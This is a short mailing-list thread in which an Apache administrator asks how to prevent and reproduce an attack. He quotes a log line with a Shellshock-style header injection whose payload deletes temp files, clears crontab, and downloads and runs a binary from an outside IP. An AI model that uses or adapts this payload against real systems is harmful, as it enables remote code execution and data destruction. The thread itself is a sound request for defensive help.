httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Victor Sterpu <vic...@casnt.ro>
Subject Re: [users@httpd] Security question
Date Fri, 03 Jul 2015 04:47:56 GMT
Yes.

On 02.07.2015 21:16, David Grant wrote:
> Cgi module in php?
>
> Sent from my iPad
>
>> On Jul 2, 2015, at 5:00 AM, Victor Sterpu <victor@casnt.ro> wrote:
>>
>> Hello
>>
>> A hacker attacked a apache2 web server by HTTP injection.
>> The log show what he has done:
>> 62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_wrapper HTTP/1.1"
404 280 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd
/var/tmp/ ;cd /tmp/ ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.*
; crontab -r ; killall -9 wget fetch curl lwp-download b f r xx y i.gif print start pscan
pnscan ps ; wget http://80.68.94.216/sc.gif ; curl -O http://80.68.94.216/sc.gif ; chmod +x
sc.gif ; nohup ./sc.gif & \");'"
>>
>> How can I prevent this in the future and how can I reproduce?
>> I tried to reproduce but is not clear how he launched this command and I want to
know so I can test my vulnerabilities in the future.
>> The path "/phppath/cgi_wrapper" doesn't exist at all.
>>
>> Thank you
>>
>> ---------------------------------------------------------------------
>> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
>> For additional commands, e-mail: users-help@httpd.apache.org
>>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
>


---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


Mime
View raw message